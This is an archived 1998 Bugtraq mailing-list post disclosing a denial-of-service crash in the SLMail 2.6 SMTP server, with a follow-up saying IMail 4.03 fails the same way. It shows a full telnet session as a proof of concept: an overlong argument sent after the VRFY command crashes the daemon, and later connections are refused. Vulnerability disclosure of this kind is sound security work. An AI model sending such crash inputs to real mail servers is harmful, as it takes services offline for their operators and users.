Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SLMail 2.6 DoS - Imail also

From: steven () EFNI COM (Jon)
Date: Wed, 11 Mar 1998 21:22:52 -0500

I had wrote earlier:



Hello,

        I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash.  I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.

craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$

        It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.

Later,

Cisc0 @ Undernet
steven () efni com




Out of boredom, I tried another smtp daemon for Windows, IMail (I tried
4.03) by IPSwitch (www.ipswitch.com). Which crashed the same way. Pretty
strange, I've only tried two windowsNT smtp daemons, and both crashed
the same way...

Cisc0 @ Undernet
steven () efni com
Previous By Date Next
Previous By Thread Next

Current thread: